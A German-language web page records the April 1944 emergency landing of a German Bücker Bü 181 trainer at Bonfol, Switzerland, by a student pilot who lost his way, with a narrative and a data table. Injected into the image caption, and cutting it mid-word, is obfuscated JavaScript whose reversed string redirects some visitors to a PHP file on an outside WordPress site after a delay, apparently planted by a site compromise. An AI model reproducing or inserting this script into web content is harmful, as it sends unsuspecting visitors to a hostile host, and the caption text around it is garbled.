Ereignisse

Gewaltig verflogen

Die Maschine mit dem Kennzeichen VS+PS landete in Bonfol und wurde am 05.04.1944 an Deutschland zurück gegeben.

Die Maschine mit dem Kennzeichen VS+PS l<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andete in Bonfol Jura und wurde am 5. April 1944 an Deutschland zurückgegeben. (349_1)“ width=“800″ height=“364″ /> Die Maschine mit dem Kennzeichen VS+PS landete in Bonfol Jura und wurde am 5. April 1944 an Deutschland zurückgegeben. (349_1)

Der Flugschüler Alkhofer startete zu einem Überlandflug in Luxeuil, hat sich dann aber über Besancon gewaltig verflogen. Auf der Suche nach dem Flugplatz Strassburg flog er in die Schweiz ein. In der Schweiz sucht man bekanntlich Strassburg vergebens, und als der Treibstoff langsam knapp wurde, landete er seine Maschine unweit der Grenze bei Bonfol im Pruntruter-Zipfel. Der mit einer Pistole bewaffnete Alkhofer wurde vorübergehend festgenommen, doch erhielt er bereits am folgenden Tag die Bewilligung zum Rückflug. Der unerfahrene Flugschüler wagte es nicht vom unebenen Notlandeplatz zu starten, und so musste ein Schweizer Pilot die Maschine samt Passagier nach Grenchen fliegen, von wo aus Alkhofer gegen 16.00 Uhr nach Hause fliegen konnte.


Ereignissdatum 4.4.1944
Ereignisszeit 18.45
Ort Bonfol
Kanton JU
Ereignis Notlandung
Nation Deutschland
Flugzeugart Trainer
Flugzeugtyp Bücker Bü 181 Bestmann
Flugzeugbezeichnung Bücker Bü 181 Bestmann
Einteilung Flugzeugführerschule A/B 2
Basis Luxeuil (F)
Auftrag Flugschule
Rückkehr 05.04.1944 Rückkehr nach Deutschland
Werknummer 110 664
Kennzeichen VS+PS
CH Archiv Nr. D034
Besatzung Pilot: Sebastian Alkhofer, konnte die Schweiz wieder verlassen
Quelle Fremde Flugzeuge in der Schweiz
Autor Theo Wilhelm